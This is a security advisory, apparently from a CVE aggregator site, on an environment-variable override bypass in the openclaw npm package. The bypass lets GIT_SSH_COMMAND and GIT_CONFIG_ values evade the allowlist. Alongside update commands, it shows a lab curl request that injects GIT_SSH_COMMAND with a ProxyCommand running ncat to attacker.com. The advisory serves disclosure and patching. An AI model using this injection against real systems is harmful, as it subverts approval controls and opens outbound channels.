Listen to this Post
The vulnerability resides in how `system.run` handles environment variable overrides. The functions `sanitizeSystemRunEnvOverrides` and `sanitizeHostExecEnv` in `src/infra/host-env-security.ts` were designed to block only a narrow set of “override-only” environment variables, failing to account for dangerous prefixes and keys. This oversight allows an attacker who can invoke `system.run` with `env` overrides to inject variables like GIT_SSH_COMMAND, GIT_CONFIG_, and NPM_CONFIG_. While the command binary and arguments (argv) are reviewed and allowlisted, these injected environment variables survive the sanitization process and reach the spawned subprocess. For an allowlisted tool like git, this is critical. The env overrides can alter the tool’s behavior by steering it to use a malicious helper command (via GIT_SSH_COMMAND) or load a malicious configuration (via GIT_CONFIG_). This creates a mismatch where the approved command line does not reflect the actual executed behavior, effectively bypassing the intent of the allowlist and approval flows. The fix, implemented in commit e27bbe4982439da6864160fd1b66445058f74801, extends the sanitization policy to block these dangerous exact keys and entire prefix families, ensuring that request-scoped overrides cannot manipulate subprocess execution.
dailycve form:
Platform: openclaw
Version: <= 2026.3.2
Vulnerability : env bypass
Severity: Medium
date: 2026-03-09
Prediction: 2026-03-08
What Undercode Say:
Analytics:
- Package: openclaw (npm)
- Total Downloads: ~5.4 million downloads last month
- Affected Version Range: All versions up to and including 2026.3.2
- Fix Commit: `e27bbe4982439da6864160fd1b66445058f74801`
– Patched Version: 2026.3.7 - Reported By: @tdjackey and @SnailSploit
Bash Commands and Codes:
Check your currently installed version of OpenClaw:
npm list openclaw
Update to the patched version (2026.3.7 or later):
npm install openclaw@latest
Verify the version after update:
npm list openclaw | grep openclaw
Demonstrate how a malicious environment variable could be passed (conceptual – for testing in a lab):
This is a simplified example of how the vulnerability could be triggered
by calling an internal OpenClaw function, not a direct shell command.
It illustrates the injection of GIT_SSH_COMMAND.
curl -X POST http://your-openclaw-instance:18789/tools/invoke \
-H "Content-Type: application/json" \
-d '{
"tool": "git",
"action": "clone",
"params": {
"repository": "https://github.com/example/repo.git"
},
"env": {
"GIT_SSH_COMMAND": "ssh -o ProxyCommand='ncat attacker.com 8080'"
}
}'
How Exploit:
An attacker with the ability to call `system.run` and supply environment variables crafts a request. They include a malicious override like `GIT_SSH_COMMAND` set to a command that connects to an attacker-controlled server or executes a different action. When the allowlisted `git` command is spawned, it inherits this environment variable and executes the attacker’s malicious command instead of, or alongside, its intended function, pivoting the execution to unintended behavior.
Protection from this CVE:
The primary protection is to update the `openclaw` npm package to version `2026.3.7` or higher immediately. This update includes the commit that extends the environment variable sanitization to block the dangerous `GIT_` and `NPM_CONFIG_` prefixes and specific keys. As a defense-in-depth measure, audit any custom code that invokes `system.run` to ensure no user-supplied input can influence environment variables.
Impact:
- Confidentiality: An attacker could exfiltrate data by manipulating a tool like `git` to clone repositories to an external server or include internal files.
- Integrity: By altering configuration loading (e.g.,
GIT_CONFIG_), an attacker could change the behavior of tools, leading to the execution of unintended code or the modification of local configurations. - Bypass of Security Controls: The core impact is the circumvention of allowlist and approval mechanisms, making it a critical logic flaw that undermines the platform’s security model.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
